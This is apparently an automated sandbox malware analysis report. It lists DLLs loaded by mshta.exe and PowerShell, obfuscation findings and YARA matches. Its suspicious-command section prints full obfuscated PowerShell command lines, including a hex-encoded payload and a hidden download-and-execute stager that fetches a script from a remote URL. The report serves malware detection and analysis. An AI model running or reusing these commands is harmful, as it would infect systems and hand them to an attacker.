                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 6.2.powershell.exe.d461e90.2.raw.unpack, ---.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    .NET source code contains potential unpacker
                    Source: 6.2.powershell.exe.8fa0000.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 6.2.powershell.exe.8fa0000.1.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 6.2.powershell.exe.8fa0000.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 6.2.powershell.exe.8fa0000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 6.2.powershell.exe.8fa0000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Z));$ByteStRIng = $ENC.$ASk1r0SzJ9w7hlI1lzDwd6IqFQAkaVGMEN1fkiV4kcfSFvzFnWv14rftd4lwO5cHUNH3qIAY2a68CgayXC47vIBwZWbOUQJsQcXG2eyiTBO0zFKHSgnE4NhjKtZuMdEAok03qz8HjbVZUM6zPeez4UzgGWAwOd
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F66
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke()
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F66Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() Jump to behavior
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 6.2.powershell.exe.7890000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2722035542.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04C74960 push 38083A51h; ret 4_2_04C74A55
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04C74A48 push 38083A51h; ret 4_2_04C74A55
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04F0C184 push ds; iretd 6_2_04F0C223
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04F0C135 push cs; iretd 6_2_04F0C15B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04F0C13D push cs; iretd 6_2_04F0C15B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04F0B4F2 push ebx; iretd 6_2_04F0B50A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04F0B16C push cs; iretd 6_2_04F0B17B
